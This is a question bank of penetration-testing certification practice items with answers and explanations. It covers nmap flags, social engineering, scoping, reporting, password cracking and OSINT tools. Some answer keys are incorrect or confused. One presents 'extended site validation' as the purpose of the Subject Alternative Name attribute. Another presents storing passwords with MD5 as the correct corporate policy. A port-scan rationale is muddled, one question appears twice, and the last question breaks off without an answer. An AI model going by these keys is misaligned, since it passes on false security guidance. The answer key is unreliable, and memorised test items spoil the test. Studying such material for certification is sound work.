While performing a black box penetration test, you notice that the target organization has a public-facing server that has an expired SSL/TLS security certificate. What could you infer from this fact?
- The server’s communications can be decrypted.
- The server has already been compromised by an attacker.
- The internal system administrator isn’t paying attention to this server.
- The data stored on the server can be decrypted.
- C. The fact that the server’s administrator hasn’t renewed its security certificate indicates that they aren’t paying much attention to this server. This would make this system a ripe target for compromise because it is possible that there are other factors (such as updates) that the administrator has also neglected.
Which of the following best describes the term integrity within the context of penetration testing?
A. Preventing unauthorized access to information
B. Preventing unauthorized modifications to information
C. Ensuring information remains available for authorized access
D. Gaining unauthorized access to information
- B. Cybersecurity professionals use the well-known CIA triad model to describe the goals of information security. The letter I in CIA stands for integrity, which seeks to prevent unauthorized modification of information or systems.
You are conducting a black box penetration test for client. The client leases its office space in a building shared with other tenants. You are sitting in your car in a parking lot in front of the client’s offices scanning for wireless network signals emanating from the building. You have identified five separate SSIDs. You don’t know which one belongs to your client, so you decide to clandestinely connect to all of them and then run some simple scans to isolate which one is your client’s wireless network. What did you do incorrectly in this scenario?
A. Sitting in a car in front of the client’s offices will likely draw suspicion.
B. A gray box test would have been more effective in this scenario.
C. Wireless signals emanating outside of a building are usually too weak to be of use.
D. You are attacking wireless networks that are out of scope.
- D. Knowing which SSIDs are in scope is critical when conducting a penetration test within a shared facility with many tenants. Compromising the wrong wireless network is illegal and could result in prosecution and/or a lawsuit.
Which mobile tool provides an attack framework that can be used to exploit mobile devices running the Android operating system?
A. APKX
B. APK Studio
C. Drozer
D. DAST
- C. The Drozer utility provides a complete security auditing and attack framework designed exclusively for mobile devices running the Android operating system.
Several employees of an organization were recently victims of a phishing attack. They received an email that appeared to come from the company president. The email stated that the employees would receive disciplinary action if they did not do as the emailed instructed and click a link in the message. What principles of social engineering did the attacker use?
- Authority
- Fear
- Scarcity
- Social proof
- A. Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker used the social engineering principle of authority. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.
Your penetration testing consulting firm has been negotiating a contract with the U.S. federal government to run penetration tests against some of its systems. Which agreements will you be asked to sign instead of a statement of work (SOW)? (Choose two.)
A. Statement of objective (SOO)
B. Performance work statement (PWS)
C. Noncompete agreement
D. Purchase order (PO)
- A and B. Alternatives to a SOW used by the U.S. federal government include a statement of objectives (SOO) and a performance work statement (PWS). Purchase orders and a noncompete agreements are not typically used as alternatives to a SOW.
A penetration tester has used Social Engineer Toolkit (SET) to make a copy of a company’s cloud-hosted web mail portal and then sends an email to try to obtain the CEO’s login credentials. This is an example of what type of attack?
- An elicitation attack
- An impersonation attack
- A spear phishing attack
- A whaling attack
- C. The Social Engineer Toolkit (SET) provides a framework for automating the social engineering process, including sending spear phishing messages, hosting fake websites, and collecting credentials. Social engineering plays an important role in many attacks. SET is a menu-driven social engineering attack system. In this scenario, the penetration tester is attempting a spear phishing attack.
- During an external vulnerability scan, a penetration tester discovers the following findings:
Vulnerability
Ports
Multiple unsupported versions of Apache found
80, 443
SSLv3 accepted on HTTPS connections
443
Mod_rewrite enabled on Apache servers
80, 443
Windows Server host found
21
Given these results, how should the attack strategies be prioritized?
- Obsolete software can contain vulnerable components.
- Weak password management practices are being utilized.
- Weak protocols may be intercepted.
- Sensitive information may be revealed on the web servers.
- D. Port 21 is for TCP and FTP and is used as a control port. Port 80 is for TCP and HTTP and is used for transferring web pages. Port 443 is used for TCP, HTTPS, and is HTTP over TLS/SSL and is for encrypted transmission.
In this scenario, all the ports that the penetration tester has discovered have to do with the Web. So, the answer for this question would be that sensitive information may be revealed on the web servers since those were the ports indicated during the vulnerability scan.
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to confidential research data stored on an internal database server. You want to target an internally developed data collection application that the client’s end users use on a daily basis to catalog and store information in the database. Which information should the client provide you with prior to starting the test?
A. Configuration files
B. Data flow diagrams
C. Software development kit (SDK) documentation
D. All of the above
- D. When conducting a white box penetration test, especially one that will target applications developed in-house, having the documentation for the SDK that was used to create the application can be very helpful. Data flow diagrams can also provide penetration testers with an understanding of how the target application communicates with other network services. Configuration files may contain account information, IP addresses, API keys, and possibly even passwords.
During the discovery phase of a black box penetration test, you have identified an email address that you suspect belongs to an executive within the target organization. You use the centralops.net website to analyze that email address. The results are shown here:
What can you learn from the output?
- The organization’s email server has an IP address of 208.101.20.106.
- The organization’s email server sits behind an email filter device.
- The organization’s email server runs on Windows and has ports 80 and 443 open in its firewall.
- The organization’s email server responds to HELO commands.
- D. In this example, the output tells us that the email server responds to SMTP HELO commands. Useful information can sometimes be gleaned from an email server using HELO commands.
Which of the following best describes the term disclosure within the context of penetration testing?
A. Gaining unauthorized access to information
B. Making unauthorized changes to information
C. Preventing the legitimate use of information
D. Publicly acknowledging that a security breach has occurred and information has been compromised
- A. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The first D in DAD stands for disclosure, which refers to gaining unauthorized access to information or systems.
You are a penetration tester, and you are discussing with the client the importance of maintaining confidentiality of any findings when performing a penetration test. Why is it important to maintain confidentiality when performing penetrations tests?
A. Findings are legal documents containing privileged information.
B. Findings can assist an attacker in compromising a system.
C. Findings often contain company intellectual property.
D. Findings could lead to consumer discontent if results are made public.
- B. Confidentiality controls seek to prevent disclosure attacks. Even though confidentiality agreements (CAs) are legal documents that help to enforce confidential relationships between two parties, this question asks why it is important to maintain confidentiality of findings. If an attacker was to receive word of findings during a penetration test, they could use those to compromise your client’s system.
A penetration tester is writing a report that outlines the overall level of risk to operations. In which part of the report should the tester include this information?
A. Appendixes
B. Executive summary
C. Main body
D. Technical summary
- B. In this scenario, the question states that the penetration tester is writing a report “that outlines the overall level of risk.” Given this statement, the tester will be including this information in the executive summary. The executive summary is the most important section of the report. It should be written in a manner that conveys all of the important conclusions of the report in a clear manner that is written in “layman’s terms.” A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.
You are performing a gray box penetration test. You have just finished running extensive vulnerability scans on all of the hosts on the target network. You now need to categorize all of the devices that were scanned. Which of the following is a valid way to perform asset categorization?
- By operating system
- By asset value
- By number of vulnerabilities found
- By vulnerability severity
- All of the above
- E. The information gathered during a vulnerability scan can be categorized in many different ways. For example, it may be appropriate to categorize the information based on the operating system because different OSs have different inherent vulnerabilities. It may also be appropriate to categorize the information by the value of each associated asset. For example, vulnerabilities associated with a mission-critical database server would be of much higher value than the vulnerabilities associated with an end user’s desktop system. You could also categorize the scan results based on the number or severity of the vulnerabilities found.
Which command option will cause nmap to scan just UDP port 20 and TCP ports 21 and 22?
A. -p 20-22
B. –top-ports 1024
C. -p U:20,T:21,22
D. -p-
- C. The -p U:20,T:21,22 command tells nmap to just scan UDP port 20 and TCP ports 21 and 22. The other options in this question will also scan these ports; however, they also scan many other unwanted ports.
As a part of a gray box penetration test, you need to create a Ruby script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
A. Target[HostName] = FS1
B. Target = [{“HostName”:”FS1”}]
C. $Target.HostName = ‘FS1’
D. _Target = {“HostName” => “FS1”}
- D. When creating an associative array in a Ruby script, you use the following syntax: _array_name = {“element_name” => “value”} .
In this example, the line _Target = {“HostName” => “FS1”} assigns a value of FS1 to the element named HostName within the Target array.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization’s servers and discover that port 23 is open. What does this indicate?
- It is a DNS server.
- It is an SSH server.
- It is a Telnet server.
- It is an FTP server.
- C. The default port for the Telnet service is 23. Telnet is used to remotely manage a system using a command-line interface. Telnet is a very old and insecure protocol. All information transmitted between the Telnet server and client is sent unencrypted, including authentication information. By sniffing traffic going in and out of this host on port 23, you may be able to capture usernames and passwords.
During a penetration test, an individual is caught trying to piggyback into the client organization’s facility. The trespasser claims to be a penetration tester and insists on being released. Prior to pressing criminal charges, a member of the client’s IT staff calls the penetration tester to determine whether the trespasser is really a member of the penetration testing team. What is this communication path called?
A. Goal reprioritization
B. De-confliction
C. Situational awareness
D. De-escalation
- B. The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is actually part of the authorized penetration test or whether it has been instigated by a third-party hacker.
You have just concluded a penetration test for a client. During the test, you were able to gain access to the server room by masquerading as a technician from an IT vendor. You were able to plug your laptop into the serial connector on the organization’s Cisco router and access its configuration. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)
A. Disable DHCP on the wired network.
B. Run the enable secret command on the router.
C. Implement procedures to vet representatives from vendors.
D. Implement MAC address filtering on the router.
- B and C. In this scenario, the router can be hardened by creating an encrypted password for privileged access. This is done using the enable secret command on the router. In addition, procedures should be set in place to vet visitors who claim to be representatives of IT vendors.
You have been hired to conduct a black box penetration test for a client. You want to use a whaling attack to expose the authentication credentials used by the organization’s leadership. What information could you use to do this? (Choose two.)
A. Nessus scan
B. Press releases
C. Censys probe
D. OpenVAS scan
E. Executive bios
- B and E. The key to a successful whaling exploit is having detailed information about the leaders in the target organization. Useful information can often be gleaned from the organization’s website in the form of press releases and executive bios. This information can provide you with names, positions, and possibly even contact information.
During a black box penetration test, the tester discovers that the organization’s wireless access point has been configured with an administrative username of admin and a password of Admin. The tester gains administrative access to the access point. What kind of authentication exploit occurred in this scenario?
- Weak credentials exploit
- Redirect attack
- Default credentials attack
- Credential brute-forcing
- C. This is an example of a default credentials attack. Most network devices, including access points, routers, firewalls, and so on, come from the factory preconfigured with default administrative credentials. These defaults are well documented on the Internet. If the administrator forgets to change them, then the tester can use them to gain administrative access to the device.
A security administrator is trying to encrypt communication by using the Subject Alternative Name (SAN) attribute of a certificate. What is a reason why the administrator should take advantage of SAN?
- Can protect multiple domains
- Does not require a trusted certificate authority (CA)
- Protects unlimited subdomain
- Provides extended site validation
- D. Subject Alternative Name (SAN) is an extension to X.509 that allows various values to be associated with a security certificate using a subjectAltName field. These values are called SANs and include email addresses, IP addresses, URLs, DNS names, directory names, and other names followed by a value. Using SAN provides extended site validation.
You are a penetration tester, and you are conducting a gray box penetration test for a new client. During testing, you discover that many of the client’s Windows desktop systems haven’t been updated and are vulnerable to attacks. Instead of waiting until the end of testing, you contact your client to warn them that their systems need to be updated to prevent any unwanted attacks. What type of communication trigger is being used?
A. Critical findings
B. Communication path
C. Situational awareness
D. Stages
- A. If the penetration tester finds a critical issue with the security of their client’s environment, they should not wait for the delivery of their final report. By leaving a critical vulnerability unaddressed, it may put the client at an unacceptable level of risk and result in a potential compromise. The tester should immediately notify management of the issue.
A consultant has been hired by an organization to perform a black box penetration test. She has used a variety of tools to gather OSINT about the target information. Her efforts have been very successful. In fact, she has gathered so much information that she is having a hard time organizing it into a format that she can use efficiently. Which tool could she use to organize the information that she has gathered?
A. Censys
B. Shodan
C. theHarvester
D. Maltego
- D. Maltego is a utility that penetration testers frequently use to organize the information they have gathered from OSINT sources. One of its key benefits is its ability to graphically display the information discovered and visually link it together.
Which option causes nmap to scan using tiny, fragmented packets in an attempt to fool a packet filtering firewall?
A. -f
B. -Pn
C. -n
D. -sC
- A. The –f option causes nmap to scan using tiny, fragmented packets. Sometimes these small packets can be more difficult for packet filtering firewalls to properly analyze.
While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax:
echo {$PrimeNumArray[2]}
Which type of script could this be?
A. PowerShell
B. Bash
C. Ruby
D. Python
- B. When referencing a value from an array, Bash uses the following syntax: {$array_name[position]}. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.
Which penetration testing tool provides penetration testers with a huge number of exploits that can be used to compromise the target organization’s network?
A. Metasploit Framework
B. SET
C. hping
D. ncat
- A. The Metasploit Framework (MSF) penetration testing tool provides a huge number of exploits that can be used to compromise the target organization’s network.
Tyson is performing a gray box penetration test. The target organization relies heavily on an application that was developed by internal programmers. He runs the application and then uses a utility to send random, unexpected data to the application’s inputs and analyzes how it responds. What kind of application analysis is happening in this scenario?
- Fuzzing
- Static code analysis
- Heuristic code analysis
- Mutation analysis
- A. Fuzzing occurs when the tester sends random, unexpected information to an application’s inputs to see how it responds. For example, the tester could try to perform a buffer overflow exploit by sending overly large input that contains executable code. If the application doesn’t handle the malicious input properly, it may be possible for executable code to be stored in the RAM of the target system and for the attacker to then be able to execute it.
A member of your help desk team receives a phone call from an individual claiming to be an employee. This person is requesting assistance to help unlock an account that has been locked out. The help desk member asks for proof of identity before access will be granted. What type of attack was the caller trying to perform?
A. Impersonation
B. Interrogation
C. Phishing
D. Shoulder surfing
- A. Impersonation involves disguising oneself as another person to gain access to facilities or resources. This may be as simple as claiming to be a staff member or as intricate as wearing a uniform and presenting a fake company ID. In this scenario, the attacker called the help desk technician, pretending to be an employee.
Your company has been asked to perform a physical security assessment. However, during the test, an individual is caught piggybacking into the client’s facility. The individual claims that he is a penetration tester and insists on being set free. Prior to pressing any criminal charges for trespassing, a member of the client’s IT department calls your office to determine whether the trespasser is really a member of the penetration testing team. What is this type of communication path called?
A. De-confliction
B. De-escalation
C. Goal reprioritization
D. Situational awareness
- A. De-confliction refers to the communication between the client and the tester to determine whether the detected attacker is actually part of the physical security assessment. It may sometimes be necessary to create a “get out of jail free” card, which has emergency off-hours phone numbers of higher ranking officers within the company who are aware of the test and can confirm that the tester has the authority to conduct the tests requested.
A penetration tester has full access to a domain controller and wants to discover any user accounts that have not been active for the past 30 days. What command should the penetration tester use?
- dsrm -users “DN=client.com; OU=hq CN=users”
- dsquery user -inactive 4
- dsquery -o -rdn -limit 30
- dsuser -name -account -limit 3
- B. Dsquery.exe is a command-line utility for finding information about various objects in the Active Directory domain. The utility is available in all Windows Server versions by default. The dsquery command allows you to query the LDAP directory to find objects that meet the specified criteria. As an attribute of the dsquery command, you need to specify the type of the AD object that you are searching for. In this scenario, you are looking for user accounts that have been inactive for the past 30 days, so you would use dsquery user -inactive < NumWeeks >.
You are a penetration tester, and you have been asked by a client to test the security of several web servers. You are able to gain access to the root/administrator on several of the servers by exploiting vulnerabilities related to the use of DNS, FTP, IMAP, POP, SMTP, and Telnet. What should you recommend to your client regarding how to better protect their web servers?
A. They should disable any unnecessary services.
B. They should increase application event logging.
C. They should use a honeypot.
D. They should use Transport Layer Security (TLS).
- A. The best recommendation would be to disable any unneeded services. Unnecessary services can pose a security risk because they increase your client’s network attack surface, providing a potential attacker a number of ways to try to exploit the system. An attack surface is the total sum of the vulnerabilities in a given computing device or network that are accessible to a potential hacker.
While performing a black box penetration test, the tester wants to crawl the target organization’s website and gather key words that may possibly be used as passwords by employees and save them in a list. The tester will then run a brute-force password utility using that list in an attempt to gain access. Which utility should be used to create the possible password file?
A. hashcat
B. CeWL
C. netcat
D. Hydra
- B. The CeWL utility can be configured to crawl the target organization’s website and gather keywords from the site that could possibly be used as passwords by employees and then save them in a list. The list can then be used to run a brute-force password attack.
A client has recently come to you voicing concern over a large number of companies being compromised by remote attackers who are looking for trade secrets. What best describes the types of adversaries that would be looking for trade secrets?
A. Advanced persistent threat (APT) actors
B. Hacktivist groups
C. Insider threats
D. Script kiddies
- A. An advanced persistent threat (APT) is a computer network attack in which a person or group gains unauthorized access to a network and remains undetected for an extended period of time. APTs provide the highest level of threat on the adversary tier list. Threat actors are often rated by their capabilities. Many of the techniques used by advanced persistent threat actors are useful for penetration testers, and vice versa. If your persistence techniques aren’t monitored for or detected by the client’s systems, the findings should include information that can help them design around this potential problem.
You have just concluded a penetration test for a client. During the test, you discovered that one of Linux system administrators uses rcp to copy files between Linux servers. In your final report, what should you recommend the client do to remediate this issue?
A. Use the scp command for file transfers.
B. Prohibit file transfers between servers.
C. Use the rsh command for file transfers.
D. Use the ftp command for file transfers.
- A. The rcp utility does not use encryption to protect network transmissions, which means authentication credentials to the remote system as well as the data being transferred are sent as plain text. To remedy this, you should recommend that the client use the scp command to copy files between servers. The scp utility is part of the SSH suite of utilities, which encrypts authentication information as well as data transfers between systems.
You are a security analyst, and you have just completed a penetration test for a new client. You are writing up the executive summary. What item would not be appropriate when writing an executive summary?
A. You should include a description of all your findings and vulnerabilities.
B. You should include a statement of risk for all found vulnerabilities.
C. You should make sure it’s written in plain language.
D. You should include all the technical details pertaining to the testing.
- D. An executive summary should not contain technical detail. The executive summary is the most important section of the report. It should be written in a manner that conveys all the important conclusions of the report in a clear manner that is written in “layman’s terms.” You should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.
Which section of a written report of penetration test findings is intended to be read by less-technical audiences?
A. Executive summary
B. Methodology
C. Findings and remediation
D. Metrics and measures
E. Conclusion
- A. When creating your written report of findings after completing a penetration test, you should provide a high-level synopsis of the test and the results in the Executive Summary. Typically, this is the first section of the report and is intended for less-technical audiences.
Which nmap timing option causes it to scan in Insane mode?
A. -T5
B. -T4
C. -T3
D. -T2
E. -T1
- A. The –T5 option causes nmap to scan in insane mode. This is the fastest type of nmap scan. However, the speed also makes it easier to detect by IDS/IPS tools or the target’s IT staff.
You are a penetration tester, and you are conducting a penetration test for a new client. You want to use rainbow tables against a password file that has been captured. How does the rainbow table crack passwords?
A. By comparing hashes to identify known values
B. By decrypting the passwords
C. By unhashing the passwords
D. By using brute-force testing of hashes
- A. Rainbow tables are lists of precomputed hashes for all possible passwords for a given set of password rules. Rainbow table tools compare hashes to the previously calculated hashes, which match to known password values. This is done via a fairly fast database lookup, allowing “cracking” of hashed passwords, even though hashes aren’t reversible. The password file is a list of hashed values.
You are meeting with your client after a penetration test is complete. At the conclusion of the meeting, you ask the client to agree in writing that you have fulfilled your responsibilities according to the contract you initially signed with the client. What is this process called?
A. Attestation of findings
B. Lessons learned
C. Client acceptance
D. Follow-up actions
- C. After a penetration test is complete, it is common for the tester to ask the client to agree (usually in writing) that the tester has fulfilled the contract that was originally signed with the client. This process is called client acceptance.
Which of the following utilities can be categorized as vulnerability scanners? (Choose two.)
A. Nikto
B. SET
C. W3AF
D. Medusa
E. Hydra
- A and C. Both Nikto and W3AF utilities are commonly used to scan targets for vulnerabilities.
Which of the following characteristics distinguish between rainbow table attacks from brute-force attacks? (Choose two).
- Rainbow table attacks reduce compute cycles at attack time.
- Rainbow tables must include precompiled hashes.
- Rainbow table attacks do not require access to hashed passwords.
- Rainbow table attacks must be performed on the network.
- Rainbow table attacks bypass the maximum failed login restrictions.
- A and B. Rainbow tables provide a powerful way to attack hashed passwords by performing a lookup rather than trying to use brute force. A rainbow table is a precomputed listing of every possible password for a given set of password requirements, which has then been hashed based on a known hashing algorithm like MD5. A rainbow table is used to attack a hashed password in reverse. A rainbow table is generally an offline-only attack. It uses fewer compute cycles than any other forms of attack. A brute-force attack is an attempt to crack a password or username by using a trial-and-error approach with an attacker submitting many passwords or passphrases with the chance of eventually guessing the password correctly.
You are performing reconnaissance as a part of a black box penetration test. You notice that the employees of the target organization commonly congregate at a particular outdoor restaurant for lunch. You begin frequenting the same restaurant for lunch and make friends with several of the target organization’s employees. After you gain their trust, they begin to share information about their jobs, computers, bosses, customers, projects, and so on. What type of exploit occurred in this scenario?
- Whaling
- Elicitation
- Interrogation
- Phishing
- B. This is an example of elicitation. By gaining the employees’ trust, the tester was able to elicit sensitive information from them about their employer.
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other?
A. >=
B. -gt
C. -ge
D. !>=
- B. The -gt relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other.
Which type of penetration test best simulates an outsider attack?
A. Black box
B. Gray box
C. White box
D. Blue box
- A. In a black box penetration test, the tester has no prior knowledge of the target. Therefore, it best simulates what would happen during an attack from the outside. White-box and gray-box penetration tests allow the tester to have some degree of prior knowledge about the target.
Which ports are used by the SMB protocol? (Choose two.)
- 53
- 80
- 139
- 443
- 445
- C and E. The SMB protocol uses TCP ports 139 and 445. A system with these two ports open is most likely a Windows host running SMB or a Linux host running Samba (which is an open source implementation of the SMB service).
During a gray box penetration test, the tester is able to intercept packets being transmitted from a client to a server. The tester’s workstation poses as the server to the client. The tester is able to modify the data in the packets and then send it on to the server. The tester’s workstation poses as the client to the server. What kind of exploit is this?
- Relay attack
- DNS cache spoofing
- Pass the hash
- Replay attack
- A. This is an example of a relay attack. The attacker sits in between two hosts communicating on the network, in this case a workstation and a server. To the server, the attacker poses as the workstation. To the workstation, the attacker poses as the server.
You have just concluded a penetration test for a client. During the test, you were able to use stale user accounts associated with former employees to gain access to a sensitive file server. To address this vulnerability, you recommend that the client remove user accounts whenever an employee leaves the organization. What type of solution is this?
A. Technological
B. People
C. Process
D. Strategic
- C. Implementing off-boarding processes for employees when they leave the organization is an example of a process-based mitigation strategy.
You are a penetration tester and want to create an array using a PowerShell script. Which lines of code would you use?
A. $ports = 20, 25, 80, 443
B. ports = (20,25,80,443)
C. ports = [20,25,80,443]
D. $ports= [20,25,80,443]
- A. PowerShell requires the use of the $ before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list. Option B would work in Bash, option C would work in Ruby or Python, and option D does not follow the correct syntax for a PowerShell command. PowerShell is much simpler in the way that you declare and use variables. You just need to remember to precede the variable name with $, whether it’s for setting, changing, or retrieving the value stored in that variable.
Natasha is running a gray box penetration test. She has initially enumerated the network using a ping sweep and has found an internal web server, a domain controller, a router, and several SCADA devices used in on the production floor. Which of these devices could potentially be disrupted by a more intense vulnerability scan? (Choose two.)
- The web server
- The domain controller
- The router
- The SCADA devices
- D. SCADA manufacturing equipment tends to be much more fragile than traditional network assets, such as servers and routers. They tend to be difficult to manage, update, and protect from exploits. As such, they can also be susceptible to vulnerability scans and may go offline during the scanning process.
Which wireless exploit could be carried out by creating a fake captive portal for a wireless network that captures victims’ usernames and passwords?
- Repeating attack
- Credential harvesting
- Bluesnarfing
- Jamming attack
- B. In a credential harvesting attack, a fake website that looks like a legitimate website is used to capture victims’ usernames and passwords. In the context of a wireless exploit, this could be accomplished using a fake captive portal that looks like a legitimate captive portal that captures victims’ information.
You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do?
A. Ask the client to sign an agreement not to disclose the techniques you used during the test.
B. Remove any tester-created credentials used during the test.
C. Write a critique of the mistakes the internal administrators made during the test.
D. Obscure everything you did during the test from the client.
- B. After a penetration test, it is critical that you undo everything you have done. For example, if you created any backdoor user accounts, you should make sure you remove those credentials. You should not leave these in place as they could be used by a real attacker to compromise the system later.
Which of the following techniques involves sending one password after another at an authentication system in an attempt to find the right one?
- Rainbow table
- Teardrop attack
- Credential brute-forcing
- SYN attack
- C. Credential brute forcing is the process of trying one password after another until you finally hit the right one. This may be executed against user accounts or against other security systems, such as a WPA2 wireless network that uses a preshared key.
As the part of information gathering process during a gray box penetration test, you need to perform a certificate inspection on the target organization’s internal web server. Which utility could you use on your Kali Linux laptop to do this?
- sslyze
- Zenmap
- nmap
- hping
- A. The sslyze tool is a penetration testing tool that is commonly used to perform certificate inspection.
You are a penetration tester, and you are discussing the CIA triad model with a colleague. You are discussing the meaning of the word confidentiality. In the context of the CIA triad model, which statement best describes what confidentiality means?
A. Preventing unauthorized access to information or systems
B. Preventing unauthorized modifications to information or systems
C. Ensuring that legitimate use of information and systems remains possible
D. Preventing legitimate access to information and systems
- A. Confidentiality, integrity, and availability is known as the CIA triad. It is a model designed to guide policies for information security within an organization. Cybersecurity professionals use this model to describe the goals of information security. The CIA triad has three main characteristics of information that cybersecurity programs seek to protect:
- Confidentiality seeks to prevent unauthorized access to information or systems.
- Integrity seeks to prevent unauthorized modification of information or systems.
- Availability seeks to ensure that legitimate use of information and systems remains possible.
As a penetration tester, you want to improve your password cracking speed by building a specialized system with multiple video boards installed. Which tool can take advantage of multiple GPUs for password cracking?
A. proxychains
B. John the Ripper
C. hashcat
D. theHarvester
- C. The hashcat utility can be configured to use GPUs instead of CPUs to perform password cracking operations. This can dramatically speed up the process as GPUs can perform this task much faster than standard CPUs can.
You work for a penetration testing firm. You have been scoping an upcoming penetration test with a client. You have worked with the CIO to identify the scope of the assessment, such as in- and out-of-scope systems, the methodology to be used, the techniques allowed, and the schedule. You have a final draft of the agreement ready to be signed. Who should sign it?
A. The proper signing authority
B. The IT manager
C. The CIO
D. Any help-desk staff can sign off on the agreement.
- A. The proper signing authority within the client’s organization is the only one person authorized to agree to the penetration test scope. Who this actually is will vary from organization to organization. Therefore, you need to verify that the person who signs the agreement is actually the appropriate signing authority for the organization. Don’t assume that a given individual is authorized based on their job title alone.
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?
A. Print a hard copy and store it in a locked filing cabinet that has been bolted to the floor.
B. Save it to your Google drive account.
C. Save it in a file on your laptop.
D. Burn it to a rewritable optical disc and store it in a CD caddy on your desk.
- A. The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, storing a hard copy of the report in a locked filing cabinet that has been bolted to the floor would make it more difficult for the report to be stolen than the other options listed.
You are a penetration tester, and you are conducting a test for a new client. You have captured NTLM hashes and want to conduct a pass-the-hash attack. Unfortunately, you don’t know which systems on the network might accept the hash. What tool should you use to conduct the test?
A. Drozer
B. Hashcat
C. Hydra
D. Kismet
- C. Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.
You are a penetration tester, and you are conducting a test for a new client. You want to conduct open-source intelligence (OSINT) data collection from publicly available sources. Which of the following tools can you use? (Choose two.)
A. BeEF
B. Dynamo
C. Maltego
D. SET
E. Shodan
F. Wireshark
- C and E. There are a variety of tools that assist with this OSINT collection:
- Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine.
- Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats.
- Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts.
- Nslookup tools help identify the IP addresses associated with an organization.
- Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work.
- Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources.
- theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization.
- Whois tools gather information from public records about domain ownership.
Which of the following application scanning techniques is performed by reviewing an application’s source code?
- Static code analysis
- Dynamic code analysis
- Fuzzing
- None of the above
- A. Static code analysis is conducted by analyzing an application’s source code. Obviously, this type of testing is usually performed only during a white box penetration test. Static code analysis does not involve actually running the program. Instead, it is focused on analyzing how the application is written.
Which option causes nmap to scan a host for the 100 most commonly used IP ports, such as 20, 21, 23, 25, 53, 80, etc.?
A. -p-
B. -sV
C. -F
D. -p 100
- C. The –F option causes nmap to scan a specified number host for the 100 most commonly used IP ports. For example, this scan would include ports 20, 21, 23, 25, 53, 80, and so on. Sometimes, this is called a fast port scan.
Which of the following statements would come from a client’s corporate policy?
A. That the corporate systems must store passwords using the MD5 hashing algorithm
B. That employee passwords must contain a minimum of eight characters, with one being alphanumeric
C. The phone number to contact the help desk to perform password resets
D. That in order to access corporate assets, employees must use strong passwords
- A. A company policy, also known as a corporate policy, is a documented set of guidelines, formulated after an analysis of all internal and external factors that can affect a firm’s objectives, operations, and plans. It is created by the company’s board of directors. Corporate policy lays down the company’s response to known and knowable situations and circumstances. It also determines the formulation and implementation of strategy and directs and restricts the plans, decisions, and actions of the company’s officers in achievement of its objectives. In this scenario, the corporate policy should be detailed and specific; hence, the corporate systems must store passwords using the MD5 hashing algorithm.
You are a penetration tester, and you have been asked to perform a black box penetration test for a new client. You want to find out who owns the client’s domain name. What tool can you use to find this information?
A. Nslookup
B. Maltego
C. Shodan
D. Whois
- D. Whois is a widely used Internet record listing that identifies who owns a domain and how to get in contact with them. The Internet Corporation for Assigned Names and Numbers (ICANN) regulates domain name registration and ownership. Whois records have proven to be extremely helpful and have developed into an essential resource for maintaining the integrity of the domain name registration and website ownership process.
By using phishing, a penetration tester was able to retrieve the initial VPN user domain credentials from a member of the IT department. Then the tester obtained hashes over the VPN and effortlessly cracked them by using a dictionary attack. The tester should recommend which of the following remediation steps to the client? (Choose three.)
A. Recommend increased password complexity requirements.
B. Recommend implementing two-factor authentication for remote access.
C. Recommend installing an intrusion prevention system.
D. Recommend installing a security information event monitoring solution.
E. Recommend preventing members of the IT department from interactively logging in as administrators.
F. Recommend requiring that all employees take security awareness training.
G. Recommend upgrading the cipher suite used for the VPN solution.
- A, F, and G. In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that uses Transport Layer Security (TLS) or Secure Socket Layer (SSL). The set of algorithms that cipher suites usually contain includes a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.
Which of the following threat actors typically have the financial resources and technical expertise required to develop their own extensive exploits? (Choose two.)
A. Organized crime
B. Malicious insider
C. Script kiddie
D. Nation-state actor
E. Hacktivist
- A and D. Organized crime and nation-state threat actors typically have access to extensive financial resources and technical expertise. This many times allows them to develop their own custom exploits that aren’t used by anyone else.
Which of the following best describes the term denial within the context of penetration testing?
A. Gaining unauthorized access to information
B. Making unauthorized changes to information
C. Preventing the legitimate use of information
D. Failing to publicly acknowledging that a security breach has occurred and that information has been compromised
- C. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The second D in DAD stands for denial, which refers to preventing the legitimate use of information or systems.
A penetration tester has successfully exploited a DM2 server that seems to be listening to an outbound port. The tester wants to forward that traffic back to a device. What are the best tools to do this? (Choose two.)
A. Cain and Abel
B. Netcat
C. Nmap
D. Secure Shell (SSH)
E. Tcpdump
F. Wireshark
